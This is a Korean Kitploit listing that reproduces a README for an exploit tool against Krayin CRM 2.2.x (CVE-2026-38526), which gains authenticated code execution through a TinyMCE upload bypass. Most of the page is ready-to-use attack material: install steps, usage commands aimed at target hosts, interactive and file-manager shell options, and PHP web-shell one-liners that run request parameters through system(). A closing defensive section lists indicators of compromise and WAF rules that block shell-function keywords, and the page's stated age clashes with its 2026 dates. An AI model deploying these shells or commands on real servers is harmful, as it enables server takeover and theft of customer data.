Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526 익스플로잇 for Krayin CRM v2.2.x - TinyMCE 파일 업로드 우회를 통한 인증된 RCE. 대화형 셸, 다중 유형 페이로드, 자동 셸 생성 및 검증 기능 제공. 작성자: Sudeepa Wanigarathna. 승인된 테스트 전용입니다. | Kitploit
도구/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingShellcode Generation
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526 익스플로잇 for Krayin CRM v2.2.x - TinyMCE 파일 업로드 우회를 통한 인증된 RCE. 대화형 셸, 다중 유형 페이로드, 자동 셸 생성 및 검증 기능 제공. 작성자: Sudeepa Wanigarathna. 승인된 테스트 전용입니다.

저장소 보기
31개월 전아직 검토되지 않음

🔓 Krayin CRM v2.2.x - 인증된 원격 코드 실행 익스플로잇

License: MIT CVE-2026-38526

⚠️ 승인된 보안 테스트 전용 - 무단 사용은 불법이며 비윤리적입니다.

📋 개요

이 익스플로잇 도구는 Krayin CRM 버전 2.2.x에서 발견된 중요 인증된 원격 코드 실행(RCE) 취약점을 시연합니다. 이 취약점은 TinyMCE 파일 업로드 기능에 존재하며, 인증된 관리자가 서버에 임의의 PHP 코드를 업로드하고 실행할 수 있게 합니다.

속성값
CVE IDCVE-2026-38526
영향받는 소프트웨어Krayin CRM v2.2.x
취약점 유형인증된 원격 코드 실행(RCE)
인증 필요예 (관리자 수준 접근)
영향전체 시스템 장악
CVSS 점수8.8 (높음)

🚨 취약점 세부 사항

이 취약점은 TinyMCE 파일 업로드 엔드포인트(/admin/tinymce/upload)에서 파일 유형 검증이 충분하지 않아 발생합니다. 인증된 관리자는 다음을 수행할 수 있습니다:

  • 이미지 MIME 유형으로 위장한 PHP 파일을 업로드합니다.
  • 파일은 웹에서 접근 가능한 위치에 저장됩니다.
  • 공격자는 서버에서 임의의 PHP 코드를 실행할 수 있습니다.

영향을 받는 버전

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • 패치 릴리스 이전의 모든 2.2.x 버전

✨ 기능

  • 다중 쉘 유형: 기본, 고급, 최소, 파일 관리자 및 사용자 정의.
  • 대화형 쉘: 명령 기록이 있는 완전한 터미널 스타일 인터페이스.
  • 파일 업로드: 쉘을 통해 추가 파일을 업로드합니다.
  • CSRF 토큰 추출: CSRF 보호 자동 처리.
  • 프록시 지원: HTTP/HTTPS 프록시를 통해 트래픽 라우팅.
  • 유연한 출력 형식: 텍스트, JSON 또는 자동 모드.
  • 재시도 로직: 연결 실패 시 자동 재시도.
  • 사용자 정의 헤더: 사용자 정의 HTTP 헤더 지원.
  • 자세한 모드: 상세한 디버깅 출력.
  • SSL 지원: 선택적 SSL 인증서 확인.

📦 설치

요구 사항

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

빠른 설치

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

요구 사항 파일 (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 사용법

기본 명령 구문

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [옵션]

필수 매개변수

일반적인 사용 예

root@kitploit:~
# 생성된 쉘을 이용한 기본 익스플로잇
python3 exploit.py -t http://target.com -u [email protected] -p password

# 사용자 정의 PHP 쉘 파일 업로드
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# 대화형 모드의 고급 쉘 생성
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# 익스플로잇 없이 쉘 파일만 생성
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# 테스트/디버깅용 프록시 사용
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# 자동화를 위한 JSON 출력
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# 사용자 정의 시간 초과를 포함한 자세한 모드
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# 사용자 정의 User-Agent 및 헤더
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 쉘 유형

  1. 기본 쉘 (basic) system() 함수를 사용한 간단한 명령 실행.

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. 고급 쉘 (advanced) 다양한 기능을 갖춘 쉘:

    • 여러 명령 실행 방법
    • 아름다운 터미널 스타일 웹 인터페이스
    • 명령 기록 지원
    • 현재 사용자 및 호스트 이름 표시
  3. 최소 쉘 (minimal) 은밀성을 위한 최소한의 크기.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. 파일 관리자 (file_manager) 완전한 파일 관리 인터페이스:

    • 파일 업로드
    • 파일 삭제
    • 디렉터리 생성
    • 탐색
    • 파일 권한 뷰어
  5. 사용자 정의 쉘 (custom) -f 매개변수로 자신의 PHP 쉘 파일을 사용합니다.

📝 출력 형식

텍스트 형식 (기본)

대화형 사용에 적합한 사람이 읽을 수 있는 색상 출력.

JSON 형식 (-o json)

자동화 및 통합을 위한 기계 판독 가능 형식.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

자동 형식 (-q, --quiet)

오류를 제외한 모든 출력을 생략합니다. 배치 처리에 유용합니다.

⚙️ 고급 옵션

사용자 정의 헤더 예시

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 탐지 및 예방

침해 징후 (IoC)

  • 모니터링할 파일:

    • public/storage/upload/ 디렉터리의 의심스러운 PHP 파일
    • 이중 확장자 파일 (예: image.php.jpg)
    • 의심스러운 이름의 새 파일
  • 확인할 로그:

    • /admin/tinymce/upload POST 요청
    • 비정상적인 관리자 로그인 시간
    • 실패한 인증 시도
  • 시스템 지표:

    • 예상치 못한 프로세스 실행
    • 새 cron 작업
    • 수정된 시스템 파일

예방 조치

  • 즉시 조치:

    root@kitploit:~
    # 패치 버전으로 업데이트
    composer update krayin/crm
    
    # 관리자 접근 임시 비활성화
    # 불필요한 관리자 계정 제거
    # 모든 관리자 비밀번호 변경
    
  • 파일 업로드 강화:

    root@kitploit:~
    // 확장자가 아닌 내용으로 파일 유형 검증
    // 콘텐츠 보안 정책 구현
    // 웹 애플리케이션 방화벽(WAF) 사용
    // 파일 업로드 스캔 활성화
    
  • 접근 제어:

    root@kitploit:~
    # .htaccess에서 관리자 IP 제한
    # 관리자 계정에 MFA 구현
    # 정기적인 관리자 감사
    # 세션 시간 초과 정책
    
  • WAF 규칙 (ModSecurity):

    root@kitploit:~
    # 의심스러운 파일 업로드 차단
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # 웹 쉘 차단
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ 책임 있는 공개

이 취약점은 책임 있는 보안 연구를 통해 발견되었습니다. 공개 프로세스는 다음 단계를 따릅니다:

  • 발견: 보안 평가 중 취약점 식별.
  • 확인: Krayin CRM 2.2.x에서 취약점 확인.
  • 보고: Krayin CRM 개발자에게 비공개로 통보.
  • 조정: 팀과 협력하여 수정 사항 개발.
  • 패치: 공식 패치 릴리스 대기 중.
  • 공개: 패치 제공 후 공개 공개.

일정

  • 발견: TBD
  • 보고: TBD
  • 패치 릴리스: TBD
  • 공개 공개: TBD

📜 면책 조항

root@kitploit:~
THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 문제 해결

일반적인 문제

  • 문제: 인증 실패

    • 해결 방법: 자격 증명 확인, 관리자 로그인 경로가 /admin/login인지 확인
    • 확인: CSRF 토큰 추출이 올바르게 작동하는지 확인
  • 문제: 파일 업로드 실패

    • 해결 방법: 파일 권한 확인, 업로드 엔드포인트가 존재하는지 확인
    • 확인: 대상이 TinyMCE 편집기를 사용하는지 확인
  • 문제: 쉘이 명령을 실행하지 않음

    • 해결 방법: php.ini에서 PHP 함수가 비활성화되지 않았는지 확인
    • 확인: echo test와 같은 간단한 명령으로 테스트
  • 문제: SSL 인증서 오류

    • 해결 방법: --verify-ssl 플래그를 사용하거나 확인 비활성화
    • 참고: 자체 서명 인증서는 적절한 확인 없이 오류를 발생시킴

디버그 모드

root@kitploit:~
# 자세한 로깅 활성화
python3 exploit.py -t http://target.com -u admin -p pass -v

# 프록시 사용 (Burp Suite 등)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 기여

기여를 환영합니다! 다음 사항을 확인해 주세요:

  • 모든 코드는 적절히 테스트되어야 합니다.
  • 문서가 업데이트되어야 합니다.
  • 윤리적 지침을 따라야 합니다.
  • 취약점 연구는 책임감 있게 수행되어야 합니다.

📚 참고 자료

  • Krayin CRM 공식 웹사이트
  • CVE-2026-38526
  • OWASP 원격 코드 실행
  • PHP 보안 모범 사례

⭐ 지원

이 도구가 보안 연구에 유용하다고 생각하시면 다음을 고려해 주세요:

  • ⭐ 저장소에 별표 표시
  • 🔔 업데이트 팔로우
  • 📢 다른 보안 연구자와 공유

보안 연구를 위해 ❤️로 제작됨

기억하세요: 큰 힘에는 큰 책임이 따릅니다. 이 지식을 현명하게 사용하세요!

📊 빠른 명령 참조 카드

root@kitploit:~
# Quick reference
python3 exploit.py -t URL -u USER -p PASS [OPTIONS]

# Options:
#   -f FILE           Upload custom shell
#   --shell-type TYPE Basic|Advanced|Minimal|File_Manager|Custom
#   -i                Interactive mode
#   --proxy URL       HTTP proxy
#   -v                Verbose output
#   -o json           JSON output
#   --generate-only   Create shell without exploiting
#   --timeout SEC     Request timeout
#   --retry N         Retry count
#   --user-agent UA   Custom User-Agent
#   --header "K: V"   Custom headers
#   --verify-ssl      Verify SSL certificates
#   -q, --quiet       Suppress output

🔒 기억하세요: 시스템을 테스트하기 전에 항상 서면 허가를 받으세요!

도구 다운로드
매개변수설명
-t, --target대상 URL (예: http://192.168.1.100)
-u, --username관리자 사용자명 또는 이메일
-p, --password관리자 비밀번호
옵션설명기본값
--timeout요청 시간 초과(초)30
--retry재시도 횟수3
--retry-delay재시도 간 지연(초)2
--user-agent사용자 정의 User-Agent 문자열기본 브라우저 UA
--header사용자 정의 HTTP 헤더 (키: 값)없음
--verify-sslSSL 인증서 확인False
--proxyHTTP/HTTPS 프록시 URL없음
-v, --verbose디버그 출력 활성화False
-q, --quiet모든 출력 생략False